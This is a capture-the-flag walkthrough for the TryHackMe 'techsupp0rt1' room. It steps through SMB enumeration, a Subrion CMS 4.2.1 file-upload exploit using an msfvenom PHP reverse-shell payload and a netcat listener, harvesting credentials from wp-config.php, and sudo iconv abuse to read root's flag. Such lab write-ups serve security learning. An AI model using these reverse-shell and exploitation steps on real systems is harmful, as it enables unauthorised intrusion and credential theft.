tryhackme_techsupp0rt_walkthrough

Room Name - Tryhackme techsupp0rt1  

https://tryhackme.com/room/techsupp0rt1 

Difficulty - Easy

Created by - Vikaran

Starting the machine, on port 80 Apache default web page is running. 

Scanning with nmap -> sudo nmap -sC -sV <ip> | tee nmap.txt

Listing smb shares -> smbclient -L <ip>

We are able to login to websvr anonymously. 

smbclient \\\\<ip>\\websvr

Locate the enter.txt file on the share.

We are told of a subrion site. But it needs fixing. Going to http://<ip>/subrion doesn't load anything.

But the note says to edit from panel. 

If we visit http://<ip>/subrion/panel we will see a login page to subrion cms.

We have found the username admin but the password is encrypted. 

Google "cooked with magical formula" with the keyword "encryption" you will get a result from "Cyberchef". Visit the website and paste the encrypted password on the input section and double click Magic on the left hand side. First result is your password.

Now that we have both login name and password we can login to subrion. We also know from the login page that the subrion version is 4.2.1. Another quick google search will tell us that this version has file upload vulnerability.

With this information we can start digging around the admin portal. We can find a upload feature under Content->Uploads. 

Create a php payload with msfvenom or download a php reverse_shell script online.

msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -f raw > rev_shell.phar

Note: File extension should be .phar

Alternatively you can download the below python script to automate this process.

https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE.git

syntax to run the exploit should be 

python3 exploit.py -h url -l username -p password

We catch a shell with netcat

nc -lvnp 8888

We have user www-data

pwd command will tell us we are in /var/www/html/subrion/uploads direcory

go to /var/www/html/wordpress directory (If we ran gobuster earlier we will know a wordpress site already existed) (run gobuster with gobuster dir -u <ip> -w <wordlist>)

In the wordpress directory you will see a 'wp-config.php' file. Going through this file you will discover another password.

At this point you can try to login to wordpress but you can save time if you find out the username of the user in the /home directory. 

ssh into the target with the username and the second password discovered in the wp-config.php file

ssh scamsite@<ip>

Insert the password discovered.

We will be in as scamsite

sudo -l

This will reveal we have sudo access to /usr/bin/iconv

Simply 

sudo iconv /root/root.txt

We will grab the root.txt flag!